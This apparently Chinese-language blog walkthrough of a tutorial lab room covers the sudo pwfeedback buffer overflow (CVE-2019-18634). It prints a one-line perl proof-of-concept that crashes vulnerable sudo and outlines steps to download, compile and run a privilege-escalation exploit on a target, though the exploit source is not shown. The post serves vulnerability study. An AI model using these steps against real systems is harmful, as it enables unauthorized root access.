Sudo Buffer Overflow(CVE-2019-18634)

Sudo Buffer Overflow(CVE-2019-18634)

A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series


0x01 简介

新发现的sudo漏洞CVE编号为CVE-2019-18634,影响sudo v1.8.26及更早版本,漏洞根源是一个栈溢出漏洞问题。
 
Vennix称该漏洞只有在sudoers配置文件的pwfeedback启用时才可以被利用,pwfeedback是提供一种视觉反馈的特征,即当用户在终端(terminal)输入口令时会显示*。但pwfeedback特征在sudo高版本和许多其他包中并不是默认启用的,只有Linux Mint、Elementary OS等一些Linux发行版中默认启用了该特征。
 
此外,当pwfeedback启用时,该漏洞可以被任意用户利用,包括没有sudo权限的用户。
 
Sudo开发人员Todd C. Miller解释说,当用户输入口令时该漏洞可以通过管道传递大量输入到sudo,因为攻击者有用于溢出缓冲区的数据的完全控制权限,因此漏洞被利用的可能性很高。
 

0x02 POC

    perl -e 'print(("A" x 100 . "\x{00} ") x 50)' | sudo -S id
 
 

0x03 EXP

先wget下载下来
 

0x04 复现

查看sudo版本
sudo -V
符合要求
 
测试一下POC,返回Srgmentation fault表示存在改漏洞
 
查看id
 
把exp编译后传到目标机器上,scp或wget什么都行
运行exploit提权成功
gcc -o <output-file> <source-file>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值